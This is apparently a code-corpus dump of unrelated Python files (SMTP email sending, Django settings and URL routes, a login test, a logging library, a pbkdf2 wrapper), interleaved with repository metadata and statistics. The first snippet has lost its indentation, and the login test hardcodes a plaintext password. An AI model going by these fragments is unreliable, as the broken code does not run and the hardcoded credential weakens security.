# msg = MIMEText('hello, send by Python...', 'plain', 'utf-8')
# 发送HTML邮件
# msg = MIMEText('<html><body><h1>Hello</h1>' +
# '<p>send by <a href="http://www.python.org">Python</a>...</p>' +
# '</body></html>', 'html', 'utf-8')
# 发送带附件的邮件
# 邮件对象:
msg = MIMEMultipart()
msg['From'] = _format_addr('Python爱好者 <%s>' % from_addr)
msg['To'] = _format_addr('管理员 <%s>' % to_addr)
msg['Subject'] = Header('来自SMTP的问候……', 'utf-8').encode()
# 邮件正文是MIMEText:
msg.attach(MIMEText('send with file...', 'plain', 'utf-8'))
# 添加附件就是加上一个MIMEBase,从本地读取一个图片:
with open('D:/pythonWorkspace/pthonDemo/src/com/python/email/test.jpg', 'rb') as f:
# 设置附件的MIME和文件名,这里是png类型:
mime = MIMEBase('image', 'png', filename='test.png')
# 加上必要的头信息:
mime.add_header('Content-Disposition', 'attachment', filename='test.png')
mime.add_header('Content-ID', '<0>')
mime.add_header('X-Attachment-Id', '0')
# 把附件的内容读进来:
mime.set_payload(f.read())
# 用Base64编码:
encoders.encode_base64(mime)
# 添加到MIMEMultipart:
msg.attach(mime)
msg['From'] = _format_addr('Python爱好者 <%s>' % from_addr)
msg['To'] = _format_addr('管理员 <%s>' % to_addr)
msg['Subject'] = Header('来自SMTP的问候……', 'utf-8').encode()
server = smtplib.SMTP(smtp_server, 25)
server.set_debuglevel(1)
server.login(from_addr, password)
server.sendmail(from_addr, [to_addr], msg.as_string())
server.quit()
| 29.073529
| 83
| 0.676277
| 267
| 1,977
| 4.947566
| 0.397004
| 0.040878
| 0.029523
| 0.033308
| 0.195307
| 0.152914
| 0.152914
| 0.152914
| 0.152914
| 0.152914
| 0
| 0.025015
| 0.130501
| 1,977
| 68
| 84
| 29.073529
| 0.736475
| 0.233687
| 0
| 0.171429
| 0
| 0
| 0.221328
| 0.0389
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0.057143
| 0.2
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a4ab6a6c7a8f22ae4262d99f43041e035e6b535
| 602
|
py
|
Python
|
project/settings/production.py
|
chiehtu/kissaten
|
a7aad01de569107d5fd5ed2cd781bca6e5750871
|
[
"MIT"
] | null | null | null |
project/settings/production.py
|
chiehtu/kissaten
|
a7aad01de569107d5fd5ed2cd781bca6e5750871
|
[
"MIT"
] | null | null | null |
project/settings/production.py
|
chiehtu/kissaten
|
a7aad01de569107d5fd5ed2cd781bca6e5750871
|
[
"MIT"
] | null | null | null |
from .base import *
SECRET_KEY = get_env_var('SECRET_KEY')
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = get_env_var('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = get_env_var('EMAIL_HOST_PASSWORD')
EMAIL_PORT = 587
EMAIL_USE_TLS = True
DEFAULT_FROM_EMAIL = ''
USERENA_USE_HTTPS = True
| 18.8125
| 61
| 0.750831
| 81
| 602
| 5.197531
| 0.493827
| 0.106888
| 0.064133
| 0.128266
| 0.085511
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 0.137874
| 602
| 31
| 62
| 19.419355
| 0.805395
| 0
| 0
| 0
| 0
| 0
| 0.373754
| 0.277409
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.055556
| 0.055556
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a61c9cfc48e56723e2d98bba70acd01045f443c
| 1,357
|
py
|
Python
|
cv_recommender/account/urls.py
|
hhhameem/CV-Recommender
|
b85d53934f0d888835ab8201be388d7d69f0693d
|
[
"MIT"
] | 1
|
2021-09-14T17:40:17.000Z
|
2021-09-14T17:40:17.000Z
|
cv_recommender/account/urls.py
|
mjohra/Cv-Recommender-Python-Django
|
d231092f7bd989b513210dd6031fb23e28bd5dfe
|
[
"MIT"
] | 1
|
2021-03-31T17:45:15.000Z
|
2021-03-31T17:45:15.000Z
|
cv_recommender/account/urls.py
|
mjohra/Cv-Recommender-Python-Django
|
d231092f7bd989b513210dd6031fb23e28bd5dfe
|
[
"MIT"
] | 1
|
2021-03-31T16:58:50.000Z
|
2021-03-31T16:58:50.000Z
|
from django.urls import path
from django.contrib.auth import views as auth_views
from . import views
urlpatterns = [
path('register/', views.register, name='register'),
path('login/', views.userlogin, name='login'),
path('logout/', views.userlogout, name='logout'),
path('password_change/', auth_views.PasswordChangeView.as_view(),
name='password_change'),
path('password_change/done/', auth_views.PasswordChangeDoneView.as_view(),
name='password_change_done'),
path('password_reset/', auth_views.PasswordResetView.as_view(),
name='password_reset'),
path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(),
name='password_reset_done'),
path('reset/<uidb64>/<token>/', auth_views.PasswordResetConfirmView.as_view(),
name='password_reset_confirm'),
path('reset/done/', auth_views.PasswordResetCompleteView.as_view(),
name='password_reset_complete'),
path('applicantdashboard/', views.applicantdashboard,
name='applicantdashboard'),
path('recruiterdashboard/', views.recruiterdashboard,
name='recruiterdashboard'),
path('applicantdashboard/profile-edit/', views.applicantedit,
name='editapplicantprofile'),
path('recruiterdashboard/profile-edit/', views.recruiteredit,
name='editrecruiterprofile'),
]
| 45.233333
| 82
| 0.709654
| 137
| 1,357
| 6.832117
| 0.284672
| 0.067308
| 0.064103
| 0.115385
| 0.149573
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001729
| 0.147384
| 1,357
| 29
| 83
| 46.793103
| 0.80726
| 0
| 0
| 0
| 0
| 0
| 0.322771
| 0.112749
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.428571
| 0.107143
| 0
| 0.107143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a6b124cb7b2cd1d6d09ae5b84d5b49e63612508
| 679
|
py
|
Python
|
test_f_login_andy.py
|
KotoLLC/peacenik-tests
|
760f7799ab2b9312fe0cce373890195151c48fce
|
[
"Apache-2.0"
] | null | null | null |
test_f_login_andy.py
|
KotoLLC/peacenik-tests
|
760f7799ab2b9312fe0cce373890195151c48fce
|
[
"Apache-2.0"
] | null | null | null |
test_f_login_andy.py
|
KotoLLC/peacenik-tests
|
760f7799ab2b9312fe0cce373890195151c48fce
|
[
"Apache-2.0"
] | null | null | null |
from helpers import *
def test_f_login_andy():
url = "http://central.orbits.local/rpc.AuthService/Login"
raw_payload = {"name": "andy","password": "12345"}
payload = json.dumps(raw_payload)
headers = {'Content-Type': 'application/json'}
# convert dict to json by json.dumps() for body data.
response = requests.request("POST", url, headers=headers, data=payload)
save_cookies(response.cookies,"cookies.txt")
# Validate response headers and body contents, e.g. status code.
assert response.status_code == 200
# print full request and response
pretty_print_request(response.request)
pretty_print_response(response)
| 35.736842
| 75
| 0.696613
| 86
| 679
| 5.372093
| 0.604651
| 0.04329
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014467
| 0.185567
| 679
| 19
| 76
| 35.736842
| 0.820976
| 0.216495
| 0
| 0
| 0
| 0
| 0.213611
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.090909
| false
| 0.090909
| 0.090909
| 0
| 0.181818
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a78c857a857449cf31704c6af0759d610215a2d
| 25,852
|
py
|
Python
|
pypyrus_logbook/logger.py
|
t3eHawk/pypyrus_logbook
|
bd647a1c355b07e8df28c0d7298fcfe68cd9572e
|
[
"MIT"
] | null | null | null |
pypyrus_logbook/logger.py
|
t3eHawk/pypyrus_logbook
|
bd647a1c355b07e8df28c0d7298fcfe68cd9572e
|
[
"MIT"
] | null | null | null |
pypyrus_logbook/logger.py
|
t3eHawk/pypyrus_logbook
|
bd647a1c355b07e8df28c0d7298fcfe68cd9572e
|
[
"MIT"
] | 2
|
2019-02-06T08:05:43.000Z
|
2019-02-06T08:06:35.000Z
|
import atexit
import datetime as dt
import os
import platform
import pypyrus_logbook as logbook
import sys
import time
import traceback
from .conf import all_loggers
from .formatter import Formatter
from .header import Header
from .output import Root
from .record import Record
from .sysinfo import Sysinfo
class Logger():
"""This class represents a single logger.
Logger by it self is a complex set of methods, items and commands that
together gives funcionality for advanced logging in different outputs:
console, file, email, database table, HTML document - and using information
from diffrent inputs: user messages, traceback, frames, user parameters,
execution arguments and systems descriptors.
Each logger must have an unique name which will help to identify it.
Main application logger will have the same name as a python script file.
It can be accessed by native logbook methods or by calling `getlogger()`
method with no name.
Parameters
----------
name : str, optional
The argument is used te define `name` attribute
app : str, optional
The argument is used to set the `app` attribute.
desc : str, optional
The argument is used to set the `desc` attribute.
version : str, optional
The argument is used to set the `version` attribute.
status : bool, optional
The argument is used to open or close output `root`.
console : bool, optional
The argument is used to open or close output `console`.
file : bool, optional
The argument is used to open or close output `file`.
email : bool, optional
The argument is used to open or close output `email`.
html : bool, optional
The argument is used to open or close output `html`.
table : bool, optional
The argument is used to open or close output `table`.
directory : str, optional
The argument is used to set logging file folder.
filename : str, optional
The argument is used to set logging file name.
extension : str, optional
The argument is used to set logging file extension.
smtp : dict, optional
The argument is used to configure SMTP connection.
db : dict, optional
The argument is used to configure DB connection.
format : str, optional
The argument is used to set record template.
info : bool, optional
The argument is used to filter info records. The default is True.
debug : bool, optional
The argument is used to filter debug records. The default is False.
warning : bool, optional
The argument is used to filter warning records. The default is True.
error : bool, optional
The argument is used to filter error records. The default is True.
critical : bool, optional
The argument is used to filter critical records. The default is True.
alarming : bool, optional
The argument is used to enable or disable alarming mechanism. The
default is True.
control : bool, optional
The argument is used to enable or disable execution break in case
on error. The default is True.
maxsize : int or bool, optional
The argument is used to define maximum size of output file. Must be
presented as number of bytes. The default is 10 Mb.
maxdays : int or bool, optional
The argument is used to define maximum number of days that will be
logged to same file. The default is 1 which means that new output file
will be opened at each 00:00:00.
maxlevel : int or bool, optional
The argument is used to define the break error level (WARNING = 0,
ERRROR = 1, CRITICAL = 2). All that higher the break level will
interrupt application execution. The default is 1.
maxerrors : int or bool, optional
The argument is used to define maximun number of errors. The default
is False which means it is disabled.
Attributes
----------
name : str
Name of the logger.
app : str
Name of the application that we are logging.
desc : str
Description of the application that we are logging.
version : str
Version of the application that we are logging.
start_date : datetime.datetime
Date when logging was started.
rectypes : dict
All available record types. Keys are used in `Logger` write methods as
`rectype` argument. Values are used in formatting. So if you wish to
modify `rectype` form then edit appropriate one here. If you wish to
use own record types then just add it to that dictinary. By default we
provide the next few record types:
+---------+---------+
| Key | Value |
+=========+=========+
|none |NONE |
+---------+---------+
|info |INFO |
+---------+---------+
|debug |DEBUG |
+---------+---------+
|warning |WARNING |
+---------+---------+
|error |ERROR |
+---------+---------+
|critical |CRITICAL |
+---------+---------+
messages : dict
Messages that are printed with some `Logger` methods like `ok()`,
`success()`, `fail()`. If you wish to modify the text of this messages
just edit the value of appropriate item.
with_errors : int
The flag shows that logger catched errors in the application during its
execution.
count_errors : int
Number of errors that logger catched in the application during its
execution.
filters : dict
Record types filters. To filter record type just set corresponding
item value to False.
root : pypyrus_logbook.output.Root
The output `Root` object.
console : pypyrus_logbook.output.Console
The output `Console` object. Shortcut for `Logger.root.console`.
file : pypyrus_logbook.output.File
The output file. Shortcut for `Logger.output.file`.
email : pypyrus_logbook.output.Email
The output email. Shortcut for `Logger.output.email`.
html: pypyrus_logbook.output.HTML
The output HTML document. Shortcut for `Logger.output.html`.
table: pypyrus_logbook.output.Table
The output table. Shortcut for `Logger.output.table`.
formatter : pypyrus_logbook.formatter.Formatter
Logger formatter which sets all formatting configuration like
record template, error message template, line length etc.
sysinfo : pypyrus_logbook.sysinfo.Sysinfo
Special input object which parse different inputs includeing system
specifications, flag arguments, execution parameters, user parameters
and environment variables and transforms all of that to `Dataset`
object. Through the `Dataset` object data can be easily accessed by
get item operation or by point like `sysinfo.desc['hostname']` or
`sysinfo.desc.hostname`.
header : pypyrus_logbook.header.Header
The header that can be printed to the writable output.
"""
def __init__(self, name=None, app=None, desc=None, version=None,
status=True, console=True, file=True, email=False, html=False,
table=False, directory=None, filename=None, extension=None,
smtp=None, db=None, format=None, info=True, debug=False,
warning=True, error=True, critical=True, alarming=True,
control=True, maxsize=(1024*1024*10), maxdays=1, maxlevel=2,
maxerrors=False):
# Unique name of the logger.
self._name = name
# Attributes describing the application.
self.app = None
self.desc = None
self.version = None
# Some logger important attributes
self._start_date = dt.datetime.now()
self.rectypes = {'none': 'NONE', 'info': 'INFO', 'debug': 'DEBUG',
'warning': 'WARNING', 'error': 'ERROR',
'critical': 'CRITICAL'}
self.messages = {'ok': 'OK', 'success': 'SUCCESS', 'fail': 'FAIL'}
self._with_error = False
self._count_errors = 0
# Complete the initial configuration.
self.configure(app=app, desc=desc, version=version, status=status,
console=console, file=file, email=email, html=html,
table=table, directory=directory, filename=filename,
extension=extension, smtp=smtp, db=db, format=format,
info=info, debug=debug, warning=warning, error=error,
critical=critical, alarming=alarming, control=control,
maxsize=maxsize, maxdays=maxdays, maxlevel=maxlevel,
maxerrors=maxerrors)
# Output shortcuts.
self.console = self.root.console
self.file = self.root.file
self.email = self.root.email
self.html = self.root.html
self.table = self.root.table
# Set exit function.
atexit.register(self._exit)
# Add creating logger to special all_loggers dictinary.
all_loggers[self._name] = self
pass
def __str__(self):
return f'<Logger object "{self._name}">'
__repr__ = __str__
@property
def name(self):
"""Unique logger name."""
return self._name
@property
def start_date(self):
"""Logging start date."""
return self._start_date
@property
def with_error(self):
"""Flag that shows was an error or not."""
return self._with_error
@property
def count_errors(self):
"""The number of occured errors."""
return self._count_errors
def configure(self, app=None, desc=None, version=None, status=None,
console=None, file=None, email=None, html=None, table=None,
directory=None, filename=None, extension=None, smtp=None,
db=None, format=None, info=None, debug=None, warning=None,
error=None, critical=None, alarming=None, control=None,
maxsize=None, maxdays=None, maxlevel=None, maxerrors=None):
"""Main method to configure the logger and all its attributes.
This is an only one right way to customize logger. Parameters are the
same as for creatrion.
Parameters
----------
app : str, optional
The argument is used to set the `app` attribute.
desc : str, optional
The argument is used to set the `desc` attribute.
version : str, optional
The argument is used to set the `version` attribute.
status : bool, optional
The argument is used to open or close output `root`.
console : bool, optional
The argument is used to open or close output `console`.
file : bool, optional
The argument is used to open or close output `file`.
email : bool, optional
The argument is used to open or close output `email`.
html : bool, optional
The argument is used to open or close output `html`.
table : bool, optional
The argument is used to open or close output `table`.
directory : str, optional
The argument is used to set logging file folder.
filename : str, optional
The argument is used to set logging file name.
extension : str, optional
The argument is used to set logging file extension.
smtp : dict, optional
The argument is used to configure SMTP connection.
db : dict, optional
The argument is used to configure DB connection.
format : str, optional
The argument is used to set record template.
info : bool, optional
The argument is used to filter info records.
debug : bool, optional
The argument is used to filter debug records.
warning : bool, optional
The argument is used to filter warning records.
error : bool, optional
The argument is used to filter error records.
critical : bool, optional
The argument is used to filter critical records.
alarming : bool, optional
The argument is used to enable or disable alarming mechanism.
control : bool, optional
The argument is used to enable or disable execution break in case
on error.
maxsize : int or bool, optional
The argument is used to define maximum size of output file.
maxdays : int or bool, optional
The argument is used to define maximum number of days that will be
logged to same file.
maxlevel : int or bool, optional
The argument is used to define the break error level.
maxerrors : int or bool, optional
The argument is used to define maximun number of errors.
"""
if isinstance(app, str) is True: self.app = app
if isinstance(desc, str) is True: self.desc = desc
if isinstance(version, (str, int, float)) is True:
self.version = version
# Build the output root if it is not exists. In other case modify
# existing output if it is requested.
if hasattr(self, 'root') is False:
self.root = Root(self, console=console, file=file, email=email,
html=html, table=table, status=status,
directory=directory, filename=filename,
extension=extension, smtp=smtp, db=db)
else:
for key, value in {'console': console, 'file': file,
'email': email, 'html': html,
'table': table}.items():
if value is True:
getattr(self.root, key).open()
if key == 'file':
getattr(self.root, key).new()
elif value is False:
getattr(self.root, key).close()
# Customize output file path.
path = {}
if directory is not None: path['dir'] = directory
if filename is not None: path['name'] = filename
if extension is not None: path['ext'] = extension
if len(path) > 0:
self.root.file.configure(**path)
# Customize SMTP server.
if isinstance(smtp, dict) is True:
self.root.email.configure(**smtp)
# Customize database connection.
if isinstance(db, dict) is True:
self.root.table.configure(**db)
# Create formatter in case it is not exists yet or just customize it.
# Parameter format can be either string or dictionary.
# When it is string then it must describe records format.
# When it is dictionary it can contaion any parameter of formatter
# that must be customized.
if isinstance(format, str) is True:
format = {'record': format}
if hasattr(self, 'formatter') is False:
format = {} if isinstance(format, dict) is False else format
self.formatter = Formatter(**format)
elif isinstance(format, dict) is True:
self.formatter.configure(**format)
# Create or customize record type filters.
if hasattr(self, 'filters') is False:
self.filters = {}
for key, value in {'info': info, 'debug': debug, 'error': error,
'warning': warning, 'critical': critical}.items():
if isinstance(value, bool) is True:
self.filters[key] = value
# Customize limits and parameters of execution behaviour.
if isinstance(maxsize, (int, float, bool)) is True:
self._maxsize = maxsize
if isinstance(maxdays, (int, float, bool)) is True:
self._maxdays = maxdays
self.__calculate_restart_date()
if isinstance(maxlevel, (int, float, bool)) is True:
self._maxlevel = maxlevel
if isinstance(maxerrors, (int, float, bool)) is True:
self._maxerrors = maxerrors
if isinstance(alarming, bool) is True:
self._alarming = alarming
if isinstance(control, bool) is True:
self._control = control
# Initialize sysinfo instance when not exists.
if hasattr(self, 'sysinfo') is False:
self.sysinfo = Sysinfo(self)
# Initialize header instance when not exists.
if hasattr(self, 'header') is False:
self.header = Header(self)
pass
def write(self, record):
"""Direct write to the output.
Parameters
----------
record : Record
The argument is used to send it to the output `root`.
"""
self.__check_file_stats()
self.root.write(record)
pass
def record(self, rectype, message, error=False, **kwargs):
"""Basic method to write records.
Parameters
----------
rectype : str
By default method creates the record with the type NONE.
That can be changed but depends on available record types.
All registered record types are stored in the instance attribute
rectypes. If you wish to use own record type or change the
presentaion of exeisting one then edit this dictinary.
message : str
The message that must be written.
error : bool, optional
If record is error then set that parameter to `True`.
**kwargs
The keyword arguments used for additional forms (variables) for
record and message formatting.
"""
if self.filters.get(rectype, True) is True:
record = Record(self, rectype, message, error=error, **kwargs)
self.write(record)
pass
def info(self, message, **kwargs):
"""Send INFO record to output."""
rectype = 'info'
self.record(rectype, message, **kwargs)
pass
def debug(self, message, **kwargs):
"""Send DEBUG record to the output."""
rectype = 'debug'
self.record(rectype, message, **kwargs)
pass
def error(self, message=None, rectype='error', format=None, alarming=False,
level=1, **kwargs):
"""Send ERROR record to the output.
If exception in current traceback exists then method will format the
exception according to `formatter.error` string presentation. If
`formatter.error` is set to `False` the exception will be just printed
in original Python style.
Also method will send an alarm if alarming attribute is `True`, email
output is enabled and SMTP server is configurated.
If one of the limit triggers worked then application will be aborted.
Parameters
----------
message : str, optional
The message that must be written instead of exception.
rectype : str, optional
The type of error according to `rectypes` dictionary.
format : str, optional
The format of the error message.
alarming : bool
The argument is used to enable or disable the alarming mechanism
for this certain call.
level : int
The argument is used to describe the error level.
**kwargs
The keyword arguments used for additional forms (variables) for
record and message formatting.
"""
self._with_error = True
self._count_errors += 1
format = self.formatter.error if format is None else format
# Parse the error.
err_type, err_value, err_tb = sys.exc_info()
if message is None and err_type is not None:
if isinstance(format, str) is True:
err_name = err_type.__name__
err_value = err_value
for tb in traceback.walk_tb(err_tb):
f_code = tb[0].f_code
err_file = os.path.abspath(f_code.co_filename)
err_line = tb[1]
err_obj = f_code.co_name
self.record(rectype, message, error=True,
err_name=err_name, err_value=err_value,
err_file=err_file, err_line=err_line,
err_obj=err_obj, **kwargs)
elif format is False:
exception = traceback.format_exception(err_type, err_value,
err_tb)
message = '\n'
message += ''.join(exception)
self.record(rectype, message, **kwargs)
else:
message = message or ''
self.record(rectype, message, **kwargs)
# Break execution in case of critical error if permitted.
# The alarm will be generated at exit if it is configured.
if self._control is True:
if level >= self._maxlevel:
sys.exit()
if self._maxerrors is not False:
if self._count_errors > self._maxerrors:
sys.exit()
# Send alarm if execution was not aborted but alarm is needed.
if alarming is True:
self.root.email.alarm()
pass
def warning(self, message=None, **kwargs):
"""Send WARNING error record to the output."""
self.error(message, rectype='warning', level=0, **kwargs)
pass
def critical(self, message=None, **kwargs):
"""Send CRITICAL error record to the output."""
self.error(message, rectype='critical', level=2, **kwargs)
pass
def head(self):
"""Send header to the output."""
string = self.header.create()
self.write(string)
pass
def subhead(self, string):
"""Send subheader as upper-case text between two border lines to the
output.
Parameters
----------
string : str
The text that will be presented as subheader.
"""
bound = f'{self.formatter.div*self.formatter.length}\n'
string = f'{bound}\t{string}\n{bound}'.upper()
self.write(string)
pass
def line(self, message):
"""Send raw text with the new line to the output.
Parameters
----------
message : str
The message that must be written.
"""
self.write(f'{message}\n')
pass
def bound(self, div=None, length=None):
"""Write horizontal border in the output. Useful when need to separate
different blocks of information.
Parameters
----------
div : str, optional
Symbol that is used to bulid the bound.
length : int, optional
Lenght of the bound.
"""
border = self.formatter.div * self.formatter.length
self.write(border + '\n')
pass
def blank(self, number=1):
"""Write blank lines in the output.
Parameters
----------
number : int, optional
The number of the blank lines that must be written.
"""
string = '\n'*number
self.write(string)
pass
def ok(self, **kwargs):
"""Print INFO message with OK."""
rectype = 'info'
message = self.messages['ok']
self.record(rectype, message, **kwargs)
pass
def success(self, **kwargs):
"""Print INFO message with SUCCESS."""
rectype = 'info'
message = self.messages['success']
self.record(rectype, message, **kwargs)
pass
def fail(self, **kwargs):
"""Print INFO message with FAIL."""
rectype = 'info'
message = self.messages['fail']
self.record(rectype, message, **kwargs)
pass
def restart(self):
"""Restart logging. Will open new file."""
self._start_date = dt.datetime.now()
self.__calculate_restart_date()
if self.root.file.status is True:
self.root.file.new()
if self.header.used is True:
self.head()
pass
def send(self, *args, **kwargs):
"""Send email message. Note that SMTP server connection must be
configured.
"""
self.root.email.send(*args, **kwargs)
pass
def set(self, **kwargs):
"""Update values in table. Note that DB connection must be
configured.
"""
self.root.table.write(**kwargs)
pass
def _exit(self):
# Inform about the error.
if self._alarming is True and self._with_error is True:
self.root.email.alarm()
pass
def __calculate_restart_date(self):
"""Calculate the date when logger must be restarted according to
maxdays parameter.
"""
self.__restart_date = (self._start_date
+ dt.timedelta(days=self._maxdays))
pass
def __check_file_stats(self):
"""Check the output file statistics to catch when current file must be
closed and new one must be opened.
"""
if self.root.file.status is True:
if self._maxsize is not False:
if self.root.file.size is not None:
if self.root.file.size > self._maxsize:
self.restart()
return
if self._maxdays is not False:
if self.__restart_date.day == dt.datetime.now().day:
self.restart()
return
| 39.348554
| 79
| 0.592952
| 3,127
| 25,852
| 4.856092
| 0.1244
| 0.041291
| 0.047942
| 0.062693
| 0.394929
| 0.349687
| 0.314587
| 0.276984
| 0.265789
| 0.259862
| 0
| 0.001947
| 0.324501
| 25,852
| 656
| 80
| 39.408537
| 0.867606
| 0.492999
| 0
| 0.224806
| 0
| 0
| 0.032819
| 0.006209
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108527
| false
| 0.085271
| 0.054264
| 0.003876
| 0.197674
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a89b2893b587e6d66f6aa207ca89999bce84710
| 846
|
py
|
Python
|
utils/config.py
|
jtr109/Alpha2kindle
|
a411d05cafa9036a732eeb75fa13f68963f254e3
|
[
"MIT"
] | null | null | null |
utils/config.py
|
jtr109/Alpha2kindle
|
a411d05cafa9036a732eeb75fa13f68963f254e3
|
[
"MIT"
] | null | null | null |
utils/config.py
|
jtr109/Alpha2kindle
|
a411d05cafa9036a732eeb75fa13f68963f254e3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
class BaseConf(object):
HEADERS = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/55.0.2883.95 "
"Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;"
"q=0.9,image/webp,*/*;"
"q=0.8",
"Accept-Encoding": "gzip, deflate, sdch, br",
"Accept-Language": "zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4",
"Cache-Control": "max-age=0",
}
class TestConf(BaseConf):
REDIS_URL = "redis://:{password}@{hostname}:{port}/{db_number}".format(
password=os.environ.get("REDIS_PWD"),
hostname='127.0.0.1',
port=6379,
db_number=0
)
CURCONF = TestConf
| 27.290323
| 75
| 0.51773
| 110
| 846
| 3.927273
| 0.663636
| 0.023148
| 0.013889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082631
| 0.299054
| 846
| 30
| 76
| 28.2
| 0.645868
| 0.024823
| 0
| 0
| 0
| 0.045455
| 0.470231
| 0.185905
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.090909
| 0.045455
| 0
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6aa62343269180c72e1026d8bfdc9d3fa9196b1e
| 7,448
|
py
|
Python
|
gluon/contrib/pbkdf2_ctypes.py
|
Cwlowe/web2py
|
6ae4c3c274be1026cbc45b0fcd8d1180c74b9070
|
[
"BSD-3-Clause"
] | 9
|
2018-04-19T05:08:30.000Z
|
2021-11-23T07:36:58.000Z
|
gluon/contrib/pbkdf2_ctypes.py
|
mohit3011/Quiz-Mate
|
17988a623abde439aef2b43fc8dc3162b5cae15e
|
[
"BSD-3-Clause"
] | 98
|
2017-11-02T19:00:44.000Z
|
2022-03-22T16:15:39.000Z
|
gluon/contrib/pbkdf2_ctypes.py
|
mohit3011/Quiz-Mate
|
17988a623abde439aef2b43fc8dc3162b5cae15e
|
[
"BSD-3-Clause"
] | 9
|
2017-10-24T21:53:36.000Z
|
2021-11-23T07:36:59.000Z
|
# -*- coding: utf-8 -*-
"""
pbkdf2_ctypes
~~~~~~
Fast pbkdf2.
This module implements pbkdf2 for Python using crypto lib from
openssl or commoncrypto.
Note: This module is intended as a plugin replacement of pbkdf2.py
by Armin Ronacher.
Git repository:
$ git clone https://github.com/michele-comitini/pbkdf2_ctypes.git
:copyright: Copyright (c) 2013: Michele Comitini <mcm@glisco.it>
:license: LGPLv3
"""
import ctypes
import ctypes.util
import hashlib
import platform
import os.path
import binascii
import sys
__all__ = ['pkcs5_pbkdf2_hmac', 'pbkdf2_bin', 'pbkdf2_hex']
__version__ = '0.99.3'
def _commoncrypto_hashlib_to_crypto_map_get(hashfunc):
hashlib_to_crypto_map = {hashlib.sha1: 1,
hashlib.sha224: 2,
hashlib.sha256: 3,
hashlib.sha384: 4,
hashlib.sha512: 5}
crypto_hashfunc = hashlib_to_crypto_map.get(hashfunc)
if crypto_hashfunc is None:
raise ValueError('Unkwnown digest %s' % hashfunc)
return crypto_hashfunc
def _commoncrypto_pbkdf2(data, salt, iterations, digest, keylen):
"""Common Crypto compatibile wrapper
"""
c_hashfunc = ctypes.c_uint32(_commoncrypto_hashlib_to_crypto_map_get(digest))
c_pass = ctypes.c_char_p(data)
c_passlen = ctypes.c_size_t(len(data))
c_salt = ctypes.c_char_p(salt)
c_saltlen = ctypes.c_size_t(len(salt))
c_iter = ctypes.c_uint(iterations)
c_keylen = ctypes.c_size_t(keylen)
c_buff = ctypes.create_string_buffer(keylen)
crypto.CCKeyDerivationPBKDF.restype = ctypes.c_int
crypto.CCKeyDerivationPBKDF.argtypes = [ctypes.c_uint32,
ctypes.c_char_p,
ctypes.c_size_t,
ctypes.c_char_p,
ctypes.c_size_t,
ctypes.c_uint32,
ctypes.c_uint,
ctypes.c_char_p,
ctypes.c_size_t]
ret = crypto.CCKeyDerivationPBKDF(2, # hardcoded 2-> PBKDF2
c_pass, c_passlen,
c_salt, c_saltlen,
c_hashfunc,
c_iter,
c_buff,
c_keylen)
return (1 - ret, c_buff)
def _openssl_hashlib_to_crypto_map_get(hashfunc):
hashlib_to_crypto_map = {hashlib.md5: crypto.EVP_md5,
hashlib.sha1: crypto.EVP_sha1,
hashlib.sha256: crypto.EVP_sha256,
hashlib.sha224: crypto.EVP_sha224,
